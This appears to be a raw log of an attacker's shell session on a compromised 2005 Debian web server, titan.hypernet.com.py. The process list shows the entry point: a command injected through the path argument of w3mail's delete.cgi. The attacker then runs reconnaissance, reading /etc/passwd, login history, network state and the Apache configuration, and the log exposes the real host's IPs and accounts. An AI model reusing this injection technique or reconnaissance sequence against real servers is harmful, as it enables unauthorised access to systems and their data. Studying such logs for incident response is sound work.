$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux titan 2.4.18-1-686 #1 Wed Apr 14 18:20:10 UTC 2004 i686 unknown
$ w
 15:39:38 up 4 days,  3:06,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
$ ps -auxww
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  1272  484 ?        S    May12   0:02 init [2]
root         2  0.0  0.0     0    0 ?        SW   May12   0:00 [keventd]
root         3  0.0  0.0     0    0 ?        SWN  May12   0:00 [ksoftirqd_CPU0]
root         4  0.0  0.0     0    0 ?        SW   May12   0:00 [kswapd]
root         5  0.0  0.0     0    0 ?        SW   May12   0:00 [bdflush]
root         6  0.0  0.0     0    0 ?        SW   May12   0:00 [kupdated]
root        20  0.0  0.0     0    0 ?        SW   May12   0:00 [scsi_eh_0]
root        30  0.0  0.0     0    0 ?        SW   May12   0:00 [kjournald]
root        66  0.0  0.0     0    0 ?        SW   May12   0:00 [khubd]
root       108  0.0  0.0     0    0 ?        SW   May12   0:00 [kjournald]
root       109  0.0  0.0     0    0 ?        SW   May12   0:03 [kjournald]
root       110  0.0  0.0     0    0 ?        SW   May12   0:00 [kjournald]
root       111  0.0  0.0     0    0 ?        SW   May12   0:00 [kjournald]
root       134  0.0  0.0     0    0 ?        SW   May12   0:00 [eth0]
root       207  0.0  0.3  2036  780 ?        S    May12   0:01 /sbin/syslogd
root       210  0.0  0.4  1936 1068 ?        S    May12   0:00 /sbin/klogd
root       214  0.0  1.0 10584 2788 ?        S    May12   0:00 /usr/sbin/named
root       216  0.0  1.0 10584 2788 ?        S    May12   0:00 /usr/sbin/named
root       217  0.0  1.0 10584 2788 ?        S    May12   0:13 /usr/sbin/named
root       218  0.0  1.0 10584 2788 ?        S    May12   0:00 /usr/sbin/named
root       219  0.0  1.0 10584 2788 ?        S    May12   0:01 /usr/sbin/named
root       221  0.0  0.8 10252 2208 ?        S    May12   0:00 /usr/sbin/lwresd
root       223  0.0  0.8 10252 2208 ?        S    May12   0:00 /usr/sbin/lwresd
root       224  0.0  0.8 10252 2208 ?        S    May12   0:00 /usr/sbin/lwresd
root       225  0.0  0.8 10252 2208 ?        S    May12   0:00 /usr/sbin/lwresd
root       226  0.0  0.8 10252 2208 ?        S    May12   0:00 /usr/sbin/lwresd
daemon     230  0.0  0.5  3452 1520 ?        S    May12   0:00 /usr/sbin/jabberd
daemon     305  0.0  0.5  3304 1384 ?        S    May12   0:00 /usr/sbin/jabberd
root       317  0.0  0.8  4940 2140 ?        S    May12   0:00 [sendmail]
root       335  0.0  0.4  2784 1208 ?        S    May12   0:00 /usr/sbin/sshd
daemon     338  0.0  0.2  1384  580 ?        S    May12   0:00 [atd]
root       341  0.0  0.2  1652  684 ?        S    May12   0:00 /usr/sbin/cron
root       345  0.0  1.1  4604 2988 ?        S    May12   0:00 /usr/sbin/apache
root       353  0.0  0.1  1252  468 tty1     S    May12   0:00 /sbin/getty 38400 tty1
root       354  0.0  0.1  1252  468 tty2     S    May12   0:00 /sbin/getty 38400 tty2
root       355  0.0  0.1  1252  468 tty3     S    May12   0:00 /sbin/getty 38400 tty3
root       356  0.0  0.1  1252  468 tty4     S    May12   0:00 /sbin/getty 38400 tty4
root       357  0.0  0.1  1252  468 tty5     S    May12   0:00 /sbin/getty 38400 tty5
root       358  0.0  0.1  1252  468 tty6     S    May12   0:00 /sbin/getty 38400 tty6
root     12024  0.0  0.2  2044  744 ?        S    May15   0:00 /usr/sbin/lpd
www-data 16260  0.0  1.2  4720 3164 ?        S    06:25   0:00 [apache]
www-data 16261  0.0  1.2  4720 3160 ?        S    06:25   0:00 [apache]
www-data 16262  0.0  1.2  4684 3132 ?        S    06:25   0:00 [apache]
www-data 16263  0.0  1.2  4664 3080 ?        S    06:25   0:00 [apache]
www-data 16264  0.0  1.2  4700 3140 ?        S    06:25   0:00 [apache]
www-data 16783  0.0  1.2  4700 3140 ?        S    08:54   0:00 [apache]
www-data 16869  0.0  1.2  4684 3128 ?        S    09:29   0:00 [apache]
www-data 17896  0.0  1.3  4524 3460 ?        S    15:39   0:00 /usr/bin/perl /usr/lib/cgi-bin/w3mail/delete.cgi
www-data 17897  0.0  0.4  2164 1036 ?        S    15:39   0:00 sh -c /bin/rm /var/w3mail//..\/..\/;echo 89z661a231;ps -auxww
www-data 17899  0.0  0.5  3292 1432 ?        R    15:39   0:00 ps -auxww
$ ls -l /
total 97
drwxr-xr-x    2 root     root         4096 Jul  7  2004 bin
drwxr-xr-x    3 root     root         1024 Jul  7  2004 boot
drwxr-xr-x    2 root     root         4096 Mar 16  2004 cdrom
drwxr-xr-x    9 root     root        24576 May 15 06:47 dev
drwxr-xr-x   53 root     root         4096 May 12 12:33 etc
drwxr-xr-x    2 root     root         4096 Mar 16  2004 floppy
drwxrwsr-x    4 root     staff        4096 Mar 16  2004 home
drwxr-xr-x    2 root     root         4096 Mar 16  2004 initrd
drwxr-xr-x    5 root     root         4096 Jul  7  2004 lib
drwx------    2 root     root        16384 Mar 16  2004 lost+found
drwxr-xr-x    2 root     root         4096 Feb  8  2002 mnt
drwxr-xr-x    2 root     root         4096 Mar 16  2004 opt
dr-xr-xr-x   60 root     root            0 May 12 08:32 proc
drwxr-xr-x    5 root     root         4096 Mar  4 11:07 root
drwxr-xr-x    2 root     root         4096 Jul  7  2004 sbin
drwxrwxrwt    2 root     root         4096 May 16 06:25 tmp
drwxr-xr-x   14 root     root         4096 Mar 16  2004 usr
drwxr-xr-x   18 root     root         4096 Mar 17  2004 var
$ last; lastlog; cat /etc/passwd; cat /etc/hosts
root     pts/0        ppp019.hypernet. Fri May 13 11:51 - 12:11  (00:19)
reboot   system boot  2.4.18-1-686     Thu May 12 12:33         (4+03:06)
reboot   system boot  2.4.18-1-686     Wed May 11 23:36         (4+16:04)
reboot   system boot  2.4.18-1-686     Wed May  4 15:53         (11+23:47)
reboot   system boot  2.4.18-1-686     Sun May  1 23:17         (14+16:22)
wtmp begins Sun May  1 23:17:54 2005
Username         Port     From             Latest
root             pts/0    ppp019.hypernet. Fri May 13 11:51:37 -0400 2005
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
postgres                                   **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
operator                                   **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
identd                                     **Never logged in**
sshd                                       **Never logged in**
telnetd                                    **Never logged in**
webmaster                                  **Never logged in**
smmsp                                      **Never logged in**
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
man:x:6:100:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:SmartList:/var/list:/bin/sh
irc:x:39:39:ircd:/var:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
identd:x:100:65534::/var/run/identd:/bin/false
sshd:x:101:65534::/var/run/sshd:/bin/false
telnetd:x:102:102::/usr/lib/telnetd:/bin/false
webmaster:x:1000:100::/home/webmaster:/bin/bash
smmsp:x:103:101:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
127.0.0.1   localhost
216.250.201.195 titan.hypernet.com.py   titan
# The following lines are desirable for IPv6 capable hosts
# (added automatically by netbase upgrade)
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
$ netstat -an; netstat -r; netstat -rn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:515             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5222            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5223            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5269            0.0.0.0:*               LISTEN
tcp        0      0 216.250.201.195:53      0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN
tcp        0      0 216.250.201.195:80      194.63.235.147:16626    TIME_WAIT
tcp        0    991 216.250.201.195:80      194.63.235.148:4488     ESTABLISHED
tcp        0      0 216.250.201.195:80      194.63.235.147:16490    TIME_WAIT
udp        0      0 0.0.0.0:32768           0.0.0.0:*
udp        0      0 0.0.0.0:32769           0.0.0.0:*
udp        0      0 127.0.0.1:921           0.0.0.0:*
udp        0      0 216.250.201.195:53      0.0.0.0:*
udp        0      0 127.0.0.1:53            0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     592    /var/run/sendmail/mta/smcontrol
unix  7      [ ]         DGRAM                    343    /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     18192  /dev/printer
unix  2      [ ]         DGRAM                    18188
unix  2      [ ]         DGRAM                    589
unix  2      [ ]         DGRAM                    454
unix  2      [ ]         DGRAM                    397
unix  2      [ ]         DGRAM                    392
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
localnet        *               255.255.255.224 U        40 0          0 eth0
default         calisto.hyperne 0.0.0.0         UG       40 0          0 eth0
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
216.250.201.192 0.0.0.0         255.255.255.224 U        40 0          0 eth0
0.0.0.0         216.250.201.196 0.0.0.0         UG       40 0          0 eth0
$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:48:54:3B:AC:E5
          inet addr:216.250.201.195  Bcast:216.250.201.223  Mask:255.255.255.224
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:628407 errors:0 dropped:0 overruns:0 frame:0
          TX packets:492679 errors:0 dropped:0 overruns:0 carrier:0
          collisions:37426 txqueuelen:100
          RX bytes:602835208 (574.9 MiB)  TX bytes:290295098 (276.8 MiB)
          Interrupt:5 Base address:0x5000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:17 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1767 (1.7 KiB)  TX bytes:1767 (1.7 KiB)
$ ls -l /home/
total 20
drwxr-xr-x    5 root     staff        4096 Feb  5 07:33 backup
drwx------    2 root     root        16384 Mar 16  2004 lost+found
$ ls -l /tmp
total 0
$ ls -l /etc/
total 884
-rw-r-----    1 root     root         4121 Mar 16  2004 #lilo.conf#
-rw-r--r--    1 root     root         4013 Mar 16  2004 #modules.conf#
-rw-r--r--    1 root     root         4686 Apr  6  2002 Muttrc
drwxr-xr-x    2 root     root         4096 Mar 17  2004 Net
drwxr-xr-x    8 root     root         4096 Mar 16  2004 X11
-rw-r--r--    1 root     root         2091 Mar 16  2004 adduser.conf
-rw-r--r--    1 root     root           47 May 22  2004 adjtime
-rw-r--r--    1 root     root           34 Jun 19  2004 aliases
drwxr-xr-x    2 root     root         4096 Oct 10  2004 alternatives
-rw-r--r--    1 root     root         4109 Jun 10  2002 analog.conf
drwxr-xr-x    2 root     root         4096 Mar 17  2004 apache
drwxr-xr-x    3 root     root         4096 Mar 16  2004 apt
-rw-------    1 root     root          144 Jan 18  2002 at.deny
-rw-r--r--    1 root     root          211 Apr  8  2002 bash.bashrc
-rw-r--r--    1 root     root        65921 Apr  8  2002 bash_completion
drwxr-xr-x    2 root     root         4096 Apr  8  2002 bash_completion.d
drwxr-xr-x    2 root     root         4096 Jun 22  2004 bind
drwxr-xr-x    2 root     root         4096 Mar 16  2004 calendar
drwxr-s---    2 root     dip          4096 Mar 16  2004 chatscripts
-rw-r--r--    1 root     root         3956 Oct  1  2001 checksecurity.conf
drwxr-xr-x    2 root     root         4096 Mar 16  2004 console
drwxr-xr-x    2 root     root         4096 Mar 16  2004 console-tools
drwxr-xr-x    2 root     root         4096 Oct 10  2004 cron.d
drwxr-xr-x    2 root     root         4096 Oct 10  2004 cron.daily
drwxr-xr-x    2 root     root         4096 Mar 16  2004 cron.monthly
drwxr-xr-x    2 root     root         4096 Jul  7  2004 cron.weekly
-rw-r--r--    1 root     root          596 Oct  1  2001 crontab
-rw-r--r--    1 root     root          629 Apr  2  2002 csh.cshrc
-rw-r--r--    1 root     root          129 Apr  2  2002 csh.login
-rw-r--r--    1 root     root          121 Apr  2  2002 csh.logout
-rw-r--r--    1 root     root           48 May  7  2004 cvs-cron.conf
-rw-r--r--    1 root     root         2290 Mar 28  2002 debconf.conf
-rw-r--r--    1 root     root            4 Nov 28  2001 debian_version
drwxr-xr-x    2 root     root         4096 Mar 16  2004 default
-rw-r--r--    1 root     root          336 Mar 24  2002 deluser.conf
-rwxr-xr-x    1 root     root         5904 Mar 16  2002 dhclient-script
-rw-r--r--    1 root     root         1518 Mar 16  2002 dhclient.conf
drwxr-xr-x    3 root     root         4096 Mar 16  2004 dpkg
drwxr-xr-x    3 root     root         4096 Mar 16  2004 emacs
drwxr-xr-x    3 root     root         4096 Mar 16  2004 emacs20
-rw-r--r--    1 root     root          312 Mar  4  2002 email-addresses
-rw-r--r--    1 root     root          114 Mar 16  2004 exports
-rw-r--r--    1 root     root          354 Jan 23  2002 fdmount.conf
-rw-r--r--    1 root     root          441 Mar 16  2004 fstab
-rw-r--r--    1 root     root           76 Apr 18  2002 ftpchroot
-rw-r--r--    1 root     root           91 Apr 18  2002 ftpusers
-rw-r--r--    1 root     root           97 Nov 18  2001 gateways
drwxr-xr-x    2 root     root         4096 Mar 16  2004 groff
-rw-r--r--    1 root     root          463 Jun 19  2004 group
-rw-------    1 root     root          450 Mar 16  2004 group-
-rw-r-----    1 root     shadow        389 Jun 19  2004 gshadow
-rw-------    1 root     root          379 Mar 16  2004 gshadow-
drwxr-xr-x    2 root     root         4096 Mar 16  2004 gtk
-rw-r--r--    1 root     root           26 Sep 26  1995 host.conf
-rw-r--r--    1 root     root            6 Mar 16  2004 hostname
-rw-r--r--    1 root     root          313 Mar 16  2004 hosts
-rw-r--r--    1 root     root          617 Jun 19  2004 hosts.allow
-rw-r--r--    1 root     root          898 Mar 16  2004 hosts.deny
-rw-r--r--    1 root     root         1749 Sep  1  2001 identd.conf
-rw-r--r--    1 root     root         1873 Oct 10  2004 inetd.conf
drwxr-xr-x    2 root     root         4096 Oct 10  2004 init.d
-rw-r--r--    1 root     root         2008 Jan 25  2002 inittab
-rw-r--r--    1 root     root          422 Aug 22  2001 inputrc
-rw-------    1 root     root           60 May 12 12:33 ioctl.save
drwxr-xr-x    2 root     root         4096 May 19  2004 iproute2
-rw-r--r--    1 root     root           25 Nov 28  2001 issue
-rw-r--r--    1 root     root           21 Nov 28  2001 issue.net
drwxr-xr-x    2 root     root         4096 Mar 17  2004 jabber
-rw-r--r--    1 root     root           54 Mar 16  2004 kernel-img.conf
-rw-r--r--    1 root     root         9878 Oct 10  2004 ld.so.cache
-rw-r--r--    1 root     root           15 Mar 16  2004 ld.so.conf
drwxr-xr-x    2 root     root         4096 Mar 16  2004 ldap
-rw-r-----    1 root     root         4129 Mar 16  2004 lilo.conf
-rw-r-----    1 root     root         4105 Mar 16  2004 lilo.conf~
-rw-r--r--    1 root     root         2597 Sep 18  2002 locale.alias
-rw-r--r--    1 root     root          593 Mar 16  2004 locale.gen
drwxr-xr-x    6 root     root         4096 Jun 19  2004 logcheck
-rw-r--r--    1 root     root         9812 Apr  7  2002 login.defs
-rw-r--r--    1 root     root          585 Apr 23  2002 logrotate.conf
drwxr-xr-x    2 root     root         4096 Jul  7  2004 logrotate.d
-rw-r--r--    1 root     root       135289 Jan 25  2002 lynx.cfg
-rw-r--r--    1 root     root          111 Feb 27  2002 magic
drwxr-sr-x    6 root     smmsp        4096 Oct 10  2004 mail
-rw-r--r--    1 root     root          125 Apr  3  2001 mail.rc
-rw-r--r--    1 root     root         1588 Jul  7  2004 mailcap
-rw-r--r--    1 root     root          449 Apr  9  2002 mailcap.order
-rw-r--r--    1 root     root           22 Jun 19  2004 mailname
-rw-r--r--    1 root     root         4703 Mar 14  2002 manpath.config
drwxr-xr-x    2 root     root         4096 Jul  7  2004 mc
-rw-r--r--    1 root     root        11297 Mar 11  2002 mediaprm
-rw-r--r--    1 root     root        15723 Apr  9  2002 mime.types
drwxr-xr-x    3 root     root         4096 Mar 16  2004 mkinitrd
-rw-r--r--    1 root     root          292 Mar 16  2004 modules
-rw-r--r--    1 root     root         4001 Mar 16  2004 modules.conf
-rw-r--r--    1 root     root         4001 Mar 16  2004 modules.conf.old
-rw-r--r--    1 root     root          284 Mar 16  2004 modules~
drwxr-xr-x    3 root     root         4096 Mar 16  2004 modutils
-rw-r--r--    1 root     root          372 May 12 12:33 motd
-rw-r-----    1 root     root          542 Feb 10  2002 mrtg.cfg
-rw-r--r--    1 root     root          220 May 12 08:33 mtab
-rw-r--r--    1 root     root          624 Jan 29  2002 mtools.conf
drwxr-xr-x    2 root     root         4096 Mar 16  2004 nethack
drwxr-xr-x    6 root     root         4096 Mar 16  2004 network
-rw-r--r--    1 root     root           25 Mar 16  2004 networks
-rw-r--r--    1 root     root          465 Mar 11  1999 nsswitch.conf
drwxr-xr-x    2 root     root         4096 Mar 16  2004 opt
-rw-r--r--    1 root     root          534 May 16  2001 pam.conf
drwxr-xr-x    2 root     root         4096 Oct 10  2004 pam.d
-rw-r--r--    1 root     root         1038 Jun 19  2004 passwd
-rw-------    1 root     root         1012 Jun 19  2004 passwd-
drwxr-xr-x    6 root     root         4096 Oct 10  2004 ppp
-rw-r--r--    1 root     root          643 Mar 16  2004 printcap
-rw-r--r--    1 root     root          342 Dec 22  1999 profile
-rw-r--r--    1 root     root         1748 Nov 18  2001 protocols
drwxr-xr-x    2 root     root         4096 Mar 16  2004 python2.1
drwxr-xr-x    2 root     root         4096 May 29  2002 rc.boot
drwxr-xr-x    2 root     root         4096 Jul  7  2004 rc0.d
drwxr-xr-x    2 root     root         4096 Jun 19  2004 rc1.d
drwxr-xr-x    2 root     root         4096 Sep  3  2004 rc2.d
drwxr-xr-x    2 root     root         4096 Jun 19  2004 rc3.d
drwxr-xr-x    2 root     root         4096 Jun 19  2004 rc4.d
drwxr-xr-x    2 root     root         4096 Jun 19  2004 rc5.d
drwxr-xr-x    2 root     root         4096 Jul  7  2004 rc6.d
drwxr-xr-x    2 root     root         4096 Jul  7  2004 rcS.d
-rw-r--r--    1 root     root         2443 Dec 11  2001 reportbug.conf
-rw-r--r--    1 root     root           50 Mar 16  2004 resolv.conf
-rwxr-xr-x    1 root     root          268 Feb  1  2002 rmt
-rw-r--r--    1 root     root          862 Nov 18  2001 rpc
-rw-r--r--    1 root     root         3607 Apr 10  2002 screenrc
-rw-r--r--    1 root     root          317 Apr  7  2002 securetty
drwxr-xr-x    2 root     root         4096 Mar 16  2004 security
-rw-r--r--    1 root     root         3440 Mar 16  2004 serial.conf
-rw-r--r--    1 root     root        16126 Nov 18  2001 services
-rw-r-----    1 root     shadow        709 Jun 19  2004 shadow
-rw-------    1 root     root          682 Jun 19  2004 shadow-
-rw-r--r--    1 root     root          185 Apr  7  2002 shells
drwxr-xr-x    2 root     root         4096 Mar 16  2004 skel
drwxr-xr-x    2 root     root         4096 Mar 16  2004 ssh
drwxr-xr-x    5 root     root         4096 Mar 18  2004 ssl
-rw-r--r--    1 root     root          185 Oct 27  2001 sysctl.conf
-rw-r--r--    1 root     root         1684 Oct 10  2004 syslog.conf
drwxr-xr-x   11 root     root         4096 Mar 16  2004 terminfo
-rw-r--r--    1 root     root           17 Mar 16  2004 timezone
-rw-r--r--    1 root     root          397 Jun  2  2001 updatedb.conf
-rw-r--r--    1 root     root         4002 Dec 11  2002 wgetrc
-rw-r--r--    1 root     root           56 Jan 12  2002 ytalkrc
-rw-r--r--    1 root     root          340 Apr 27  2002 zlogin
-rw-r--r--    1 root     root           54 Apr 27  2002 zlogout
-rw-r--r--    1 root     root          260 Apr 27  2002 zprofile
-rw-r--r--    1 root     root          632 Apr 27  2002 zshenv
-rw-r--r--    1 root     root         2208 Apr 27  2002 zshrc
$ ls -l /etc | grep http
$ ls -l /usr
total 80
drwxr-xr-x    6 root     root         4096 Mar 16  2004 X11R6
drwxr-xr-x    2 root     root        12288 Oct 10  2004 bin
drwxr-xr-x    2 root     root         8192 Oct 10  2004 doc
drwxr-xr-x    2 root     root         4096 Mar 16  2004 games
drwxr-xr-x   26 root     root         8192 Mar 16  2004 include
drwxr-xr-x    2 root     root         4096 Jul  7  2004 info
drwxr-xr-x   38 root     root         8192 Oct 10  2004 lib
drwxrwsr-x   11 root     staff        4096 Mar 17  2004 local
drwx------    2 root     root        16384 Mar 16  2004 lost+found
drwxr-xr-x    2 root     root         4096 Oct 10  2004 sbin
drwxr-xr-x   62 root     root         4096 Jun 19  2004 share
drwxrwsr-x    2 root     src          4096 Feb  8  2002 src
$ ls -l /usr/local/
total 36
drwxr-sr-x    5 www-data staff        4096 Mar 17  2004 atmail
drwxrwsr-x    2 root     staff        4096 Mar 16  2004 bin
drwxrwsr-x    2 root     staff        4096 Mar 16  2004 games
drwxrwsr-x    2 root     staff        4096 Mar 16  2004 include
drwxrwsr-x    4 root     staff        4096 Mar 17  2004 lib
drwxrwsr-x    3 root     staff        4096 Mar 17  2004 man
drwxrwsr-x    2 root     staff        4096 Mar 16  2004 sbin
drwxrwsr-x    5 root     staff        4096 Mar 17  2004 share
drwxrwsr-x    2 root     staff        4096 Mar 16  2004 src
$ ps -auxww | grep apa
root       345  0.0  1.1  4604 2988 ?        S    May12   0:00 /usr/sbin/apache
www-data 16260  0.0  1.2  4720 3164 ?        S    06:25   0:00 [apache]
www-data 16261  0.0  1.2  4720 3160 ?        S    06:25   0:00 [apache]
www-data 16262  0.0  1.2  4720 3164 ?        S    06:25   0:00 [apache]
www-data 16263  0.0  1.2  4700 3128 ?        S    06:25   0:00 [apache]
www-data 16264  0.0  1.2  4700 3140 ?        S    06:25   0:00 [apache]
www-data 16783  0.0  1.2  4700 3140 ?        S    08:54   0:00 [apache]
www-data 16869  0.0  1.2  4720 3160 ?        S    09:29   0:00 [apache]
www-data 17969  0.0  0.4  2164 1036 ?        S    15:43   0:00 sh -c /bin/rm /var/w3mail//..\/..\/;echo 89z661a231;ps -auxww | grep apa
www-data 17972  0.0  0.1  1336  428 ?        S    15:43   0:00 grep apa
$ ps -auxw | grep apache
root       345  0.0  1.1  4604 2988 ?        S    May12   0:00 /usr/sbin/apache
www-data 16260  0.0  1.2  4720 3164 ?        S    06:25   0:00 [apache]
www-data 16261  0.0  1.2  4720 3160 ?        S    06:25   0:00 [apache]
www-data 16262  0.0  1.2  4720 3164 ?        S    06:25   0:00 [apache]
www-data 16263  0.0  1.2  4700 3128 ?        S    06:25   0:00 [apache]
www-data 16264  0.0  1.2  4700 3140 ?        S    06:25   0:00 [apache]
www-data 16783  0.0  1.2  4700 3140 ?        S    08:54   0:00 [apache]
www-data 16869  0.0  1.2  4720 3160 ?        S    09:29   0:00 [apache]
www-data 17975  0.0  0.4  2164 1036 ?        S    15:44   0:00 sh -c /bin/rm /var/w3mail//..\/..\/;echo 89z661a231;ps -auxw | grep apache
www-data 17978  0.0  0.1  1336  428 ?        S    15:44   0:00 grep apache
$ whereis httpd.conf
httpd:
$ locate httpd.conf
/etc/apache/httpd.conf
/etc/apache/httpd.conf~
/usr/share/doc/apache/examples/httpd.conf
/usr/share/doc/apache/examples/httpd.conf-dist
/usr/share/doc/libapache-mod-perl/examples/httpd.conf.pl
$ cd /etc/apache
$ ls -la
total 184
drwxr-xr-x    3 root     root         4096 Jan 21  2001 .
drwxr-xr-x    3 root     root         4096 Mar 17  2004 ..
-rw-r--r--    1 root     root         9892 Jan 21  2001 ChangeLog
-rw-r--r--    1 root     root         1202 Jan 21  2001 INSTALL
-rwxr-xr-x    1 root     root        13118 Feb 19  2001 addressbook.cgi
-rwxr-xr-x    1 root     root         7675 Feb 19  2001 compose.cgi
-rwxr-xr-x    1 root     root         1808 Feb 19  2001 delete.cgi
-rw-r--r--    1 root     root          425 Feb 19  2001 html.end
-rw-r--r--    1 root     root          852 Feb 19  2001 html.top
drwxr-xr-x    2 root     root         4096 Jan 21  2001 images
-rwxr-xr-x    1 root     root        17251 Feb 19  2001 inbox.cgi
-rwxr-xr-x    1 root     root         7642 Jan 21  2001 install.pl
-rwxr-xr-x    1 root     root         2797 Feb 26  2001 login.cgi
-rwxr-xr-x    1 root     root         2099 Feb 19  2001 logout.cgi
-rwxr-xr-x    1 root     root         1165 Feb 19  2001 prefs.cgi
-rwxr-xr-x    1 root     root        11236 Dec 21  2000 sendmessage.cgi
-rwxr-xr-x    1 root     root        16975 Feb 19  2001 showmessage.cgi
-rw-r--r--    1 root     root         5390 May 31  2000 userprefs.cgi
-rwxr-xr-x    1 root     root         9596 Dec 27  2000 w3admin.cgi
-rw-r--r--    1 nobody   root          849 Mar 17  2004 w3mail.conf
-rwxr-xr-x    1 root     root        21004 Feb 19  2001 w3vars.cgi
$ ls -l /etc/apache
total 80
-rw-r--r--    1 root     root          285 Mar 16  2004 access.conf
-rw-r--r--    1 root     root        35178 Mar 17  2004 httpd.conf
-rw-r--r--    1 root     root        35617 Mar 17  2004 httpd.conf~
-rw-r--r--    1 root     root          297 Mar 16  2004 srm.conf
$ cat /etc/apache/httpd.conf
## httpd.conf -- Apache HTTP server configuration file
# Based upon the NCSA server configuration files originally by Rob McCool.
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# the directives.
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
# After this file is processed, the server will look for and process
# /etc/apache/srm.conf and then /etc/apache/access.conf
# unless you have overridden these with ResourceConfig and/or
# AccessConfig directives here.
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
# with ServerRoot set to "/usr/local/apache" will be interpreted by the
# server as "/usr/local/apache/logs/foo.log".
### Section 1: Global Environment
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
# ServerType is either inetd, or standalone.  Inetd mode is only supported on
# Unix platforms.
ServerType standalone
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept, unless they are specified
# with an absolute path.
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation
# you will save yourself a lot of trouble.
# Do NOT add a slash at the end of the directory path.
ServerRoot /etc/apache
# The LockFile directive sets the path to the lockfile used when Apache
# is compiled with either USE_FCNTL_SERIALIZED_ACCEPT or
# USE_FLOCK_SERIALIZED_ACCEPT. This directive should normally be left at
# its default value. The main reason for changing it is if the logs
# directory is NFS mounted, since the lockfile MUST BE STORED ON A LOCAL
# DISK. The PID of the main server process is automatically appended to
# the filename.
LockFile /var/lock/apache.lock
# PidFile: The file in which the server should record its process
# identification number when it starts.
PidFile /var/run/apache.pid
# ScoreBoardFile: File used to store internal server process information.
# Not all architectures require this.  But if yours does (you'll know because
# this file will be  created when you run Apache) then you *must* ensure that
# no two invocations of Apache share the same scoreboard file.
ScoreBoardFile /var/run/apache.scoreboard
# In the standard configuration, the server will process this file,
# srm.conf, and access.conf in that order.  The latter two files are
# now distributed empty, as it is recommended that all directives
# be kept in a single file for simplicity.  The commented-out values
# below are the built-in defaults.  You can have the server ignore
# these files altogether by using "/dev/null" (for Unix) or
# "nul" (for Win32) for the arguments to the directives.
#ResourceConfig /etc/apache/srm.conf
#AccessConfig /etc/apache/access.conf
# Timeout: The number of seconds before receives and sends time out.
Timeout 300
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
KeepAlive On
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
MaxKeepAliveRequests 100
